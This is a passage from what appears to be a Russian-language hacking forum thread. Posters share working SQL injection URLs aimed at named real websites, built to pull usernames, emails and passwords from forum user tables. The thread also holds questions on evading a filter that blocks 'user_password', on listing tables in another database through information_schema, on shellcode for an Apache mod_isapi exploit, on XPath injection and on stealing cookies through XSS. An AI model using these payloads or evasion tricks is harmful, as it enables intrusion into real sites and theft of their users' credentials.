И еще вопрос-просьба. Кодом шела может кто располагает, для открытия порта под эксплоит "Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit" ?

как вывести информацию через xpatch injection там вроде в xml данные зранятся можно с примером

http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,user_email),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=

так выводит нормально, как только в запросе ставлю слово user_password , запретка сразу срабатывает...пару таких запросов и бан по айпи...вроде не новичек , но вот как обойти хз..какие мысли?

http://www.deva.ws/index.php?idAutor=-9+/*!union+select*/+1,2,concat(username,0x3a,/*!user_password*/),4,5,6,7,8,9, 10++from+bluemc_forum.phpbb_users+limit+1,1--+&idCategorie=

Допустим есть сайт который стоит на одной базе mysql, а цмска стоит на другой к примеру cms.mysql можноли как нить при мускль иньекции с бд user.mysql выдернуть таблици с cms.mysql

если я правильно понимаю, то:

1) структуру базы тащим так: union+select+1,2,group_concat(table_name)+from+inf ormation_schema.tables+where+table_schema='имя базы'

2) тянем данные так: union+select+1,2,group_conact(login,0x3a,pass)+fro m+database_name.table_name

это подействует в случае когда конкретно уже знаем какие таблици в базе и поля, знаю что точно есть другая база, как можно с одной просмотреть какие есть таблици и поля в другой базе, для примера:

_http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,concat_ws(0x3b,version(),database (),user()),3,4,concat_ws(0x3a,name,password)+from+ users--

а админка на WP:

_http://www.indiagatebkk.com/blog/wp-login.php

там одна база

http://www.indiagatebkk.com/menudetails.php?id=-8+union+select+1,2,3,4,group_concat%28schema_name% 29+from+information_schema.schemata--

грамотней попытайся задать вопрос

можно узнать куки через XSS иньекцию если стоит HTTPOnly флаг?